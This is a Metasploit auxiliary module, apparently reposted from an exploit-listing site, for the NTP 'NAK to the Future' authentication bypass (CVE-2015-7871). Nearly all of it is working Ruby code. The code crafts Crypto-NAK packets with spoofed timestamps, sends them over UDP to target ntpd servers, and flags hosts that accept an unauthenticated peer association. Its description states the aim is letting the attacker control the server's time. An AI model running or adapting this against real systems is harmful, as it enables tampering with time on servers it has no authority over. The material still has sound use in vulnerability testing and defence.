## https://sploitus.com/exploit?id=PACKETSTORM:180962
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::NTP
def initialize(info = {})
super(
update_info(
info,
'Name' => 'NTP "NAK to the Future"',
'Description' => %q(
Crypto-NAK packets can be used to cause ntpd to accept time from
unauthenticated ephemeral symmetric peers by bypassing the
authentication required to mobilize peer associations. This module
sends these Crypto-NAK packets in order to establish an association
between the target ntpd instance and the attacking client. The end goal
is to cause ntpd to declare the legitimate peers "false tickers" and
choose the attacking clients as the preferred peers, allowing
these peers to control time.
),
'Author' =>
[
'Matthew Van Gundy of Cisco ASIG', # vulnerability discovery
'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
[ 'URL', 'https://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
[ 'URL', 'https://support.ntp.org/bin/view/Main/NtpBug2941' ],
[ 'CVE', '2015-7871' ]
]
)
)
register_options(
[
OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300])
])
end
def build_crypto_nak(time)
probe = Rex::Proto::NTP::NTPSymmetric.new
probe.stratum = 1
probe.poll = 10
probe.mode = 1
unless time
now = Time.now
# compute the timestamp. NTP stores a timestamp as 64-bit unsigned
# integer, the high 32-bits representing the number of seconds since era
# epoch and the low 32-bits representing the fraction of a second. The era
# epoch in this case is Jan 1 1900, so we must add the number of seconds
# between then and the ruby era epoch, Jan 1 1970, which is 2208988800
time = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec
end
# TODO: use different values for each?
probe.reference_timestamp = time
probe.origin_timestamp = time
probe.receive_timestamp = time
probe.transmit_timestamp = time
# key-id 0
probe.payload = "\x00\x00\x00\x00"
probe
end
def check
connect_udp
# pick a random 64-bit timestamp
canary_timestamp = rand((2**32)..((2**64) - 1))
probe = build_crypto_nak(canary_timestamp)
udp_sock.put(probe)
expected_length = probe.to_binary_s.length - probe.payload.length
response = udp_sock.timed_read(expected_length)
disconnect_udp
if response.length == expected_length
ntp_symmetric = Rex::Proto::NTP::NTPSymmetric.new.read(response)
if ntp_symmetric.mode == 2 && ntp_symmetric.origin_timestamp == canary_timestamp
vprint_good("#{rhost}:#{rport} - NTP - VULNERABLE: Accepted a NTP symmetric active association")
report_vuln(
host: rhost,
port: rport.to_i,
proto: 'udp',
sname: 'ntp',
name: 'NTP "NAK to the Future"',
info: 'Accepted an NTP symmetric active association by replying with a symmetric passive request',
refs: references
)
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Unknown
end
def run_host(_ip)
check
end
end